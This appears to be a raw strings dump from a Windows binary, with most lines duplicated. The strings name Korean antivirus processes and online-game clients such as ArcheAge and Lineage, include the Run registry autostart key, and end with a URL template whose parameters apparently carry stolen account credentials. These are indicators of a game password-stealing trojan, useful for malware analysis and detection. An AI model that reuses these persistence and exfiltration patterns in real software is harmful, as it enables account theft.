bsiedk.dat
bsdfsos.dat
bsdfsos.dat
bsdfloc.dat
bsdfloc.dat
bsiednf.dat
bsiednf.dat
bsiear.dat
bsiear.dat
bsieal.dat
bsieal.dat
V3LRun.exe
V3LRun.exe
V3LTray.exe
V3LTray.exe
iexplore.exe
iexplore.exe
EstRtw.sys
EstRtw.sys
fltlib.dll
fltlib.dll
Mozilla/5.0 (compatible)
Mozilla/5.0 (compatible)
ntdll.dll
ntdll.dll
urlinfo
urlinfo
\\.\%s
\\.\%s
Mozilla/6.0 (compatible)
Mozilla/6.0 (compatible)
\??\%s
\??\%s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
r2client.exe
r2client.exe
|9|3|1|1|0|
|9|3|1|1|0|
|9|1|1|1|0|
|9|1|1|1|0|
CMStarterCore.exe
CMStarterCore.exe
archeage.exe
archeage.exe
msvcr100.dll
msvcr100.dll
x2game.dll
x2game.dll
%s%s.dat
%s%s.dat
%s[%d]
%s[%d]
lin.bin
lin.bin
mss32.dll
mss32.dll
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&rp=